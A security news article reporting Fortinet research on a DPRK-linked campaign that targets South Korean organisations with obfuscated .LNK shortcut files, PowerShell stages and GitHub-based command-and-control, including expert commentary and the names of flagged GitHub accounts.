DPRK-linked threat actors are preferring stealth over sophistication in targeting South Korean organizations, as researchers report the use of weaponized Windows shortcut (.LNK) files and GitHub-based command-and-control (C2) channels in a new campaign.
According to new Fortinet findings, a series of attacks that began in 2024 were found using a multi-stage scripting process and GitHub C2 to evade detection, with obfuscation improving with each iteration of the campaign.
“In recent months, the threat actor has altered their tactics,” Fortinet researchers said in a blog post. “They now embed decoding functions within LNK arguments and include encoded payloads directly inside the files.” The ongoing campaign seems to be targeted at expanding DPRK’s surveillance within South Korea. The researchers noted that lesser obfuscation and heavier metadata in the previous iterations of the campaign allowed them to link it to attacks spreading the XenoRAT malware.
Jason Soroko, senior fellow at Sectigo, believes the strategy aligns with the recent trend of attackers relying on built-in Windows utilities and legitimate services to carry out their objectives. “Modern cyber espionage has fundamentally shifted toward a highly evasive strategy known as living off the land,” he said, noting that attackers are increasingly abusing native tools like PowerShell and scheduled tasks to blend into normal system activity.
LNK files are long known for their history of exploitation, with Microsoft issuing multiple patches and advisories over the years to curb their misuse.
LNK files used as stealth loaders
The campaign begins its infection with a Windows shortcut file, which is typically used to launch applications or open documents, but can also embed commands to execute scripts or binaries.
“A .lnk file is how Windows handles shortcuts: Whenever you click on that Outlook icon on your desktop, you’re actually clicking on a separate file that uses the Outlook image and directs the operating system to open up Microsoft Outlook,” explained Jamie Boote, senior manager, strategic security consulting at Black Duck. “You can also create shortcut links (.lnk files) to websites, programs with additional commands, executable scripts, and just about anything else you could type into Windows’s Run command window.”
The LNK files in the campaign use various scripts, including earlier versions with simple character concatenation to mask GitHub C2 address and the access token, the researchers said, adding that it was easy to determine that the script was meant to run a PowerShell command fetched from GitHub.
Later versions shifted to basic character decoding functions, making detection a little trickier, but still had telling metadata like name, sizes, and modification dates that allowed researchers to connect it to the specific campaign. The name column repeatedly uses “Hangul document,” a pattern consistent with state-affiliated groups like Kimsuky, APT37, and Lazarus.
In its latest iteration, the campaign operators have removed the identifying metadata, now using only a decoding function within the arguments.
GitHub as C2
Researchers also highlighted the campaign’s use of GitHub as a C2 layer. Rather than communicating with suspicious-looking or newly registered domains, the malware interacts with GitHub repositories and APIs to receive instructions and exfiltrate data.
“The fact that this shortcut file creates a chain that ultimately reaches out to a GitHub repository, and pulls scripts over the internet, should put network defenders on alert that even productivity platforms can be attack vectors,” Boote added.
After infecting a system, the PowerShell scripts perform system checks to confirm the environment isn’t under analysis, ensure the malware persists after system reboot through the Scheduled Task, and collect detailed system information. Only then is a stable connection attempted with subsequent scripts, where additional modules and instructions are fetched from the attacker’s GitHub repository.
The researchers flagged a GitHub account, “motoralis”, with consistent activity dating back to 2025, and other less frequent accounts, including “God0808RAMA,” “Pigresy80,” “entire73,” “pandora0009,” and “brandonleeodd93-blip.”
Additionally, the blog post shared a set of URLs and hash functions to support detection efforts.
No Responses